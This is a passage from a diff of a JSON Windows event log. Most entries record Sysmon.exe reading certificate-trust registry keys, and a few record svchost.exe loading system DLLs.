"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sxs.dll", - "image_path": "C:\\Windows\\System32\\sxs.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "AppXDeploymentClient.dll", - "image_path": "C:\\Windows\\System32\\AppXDeploymentClient.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "StateRepository.Core.dll", - "image_path": "C:\\Windows\\System32\\StateRepository.Core.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 